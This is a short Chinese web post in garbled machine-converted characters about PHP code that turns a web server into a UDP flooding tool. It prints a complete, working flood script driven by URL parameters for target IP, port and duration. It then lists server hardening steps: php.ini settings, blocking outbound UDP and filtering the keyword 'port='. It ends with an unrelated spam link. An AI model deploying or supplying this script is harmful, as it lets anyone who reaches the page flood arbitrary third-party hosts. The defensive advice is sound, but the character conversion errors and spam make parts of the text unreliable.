用PHP代碼調用sockets,直接用服務器的網絡攻擊別的IP,常見代碼以下:
代碼以下:
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand
\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?> php
表現特徵:
一打開IIS,服務器的流出帶寬就用光-----就是說服務器不斷向別人發包,這個狀況和受到DDOS攻擊是不一樣的,DDOS是不斷收到大量數據包.
解決辦法:
禁止上述的代碼:
在c:\windows\php.ini裏設置:
disable_functions =gzinflate;
在c:\windows\php.ini裏設其值爲Off
allow_url_fopen = Off
而且:
;extension=php_sockets.dll
前面的;號必定要有,意思就是限制用sockets.dll
前面的;號要保留
而後重啓IIS
若是上述方式仍然無效,你能夠在IIS中,容許的擴展中,禁止PHP的擴展測試.
另外,對於沒加密的php攻擊代碼,還能夠用如下辦法處理:
1.在IP策略,或防火牆中,禁止全部udp向外發送
2.用一流信息監控,在SQL攔截及網址攔截中,攔截port=這個關鍵詞
windows
你們在累了的時候,就去看看邪惡GIF動態圖吧,內涵而不色情,愉悅身心!www.530312.net服務器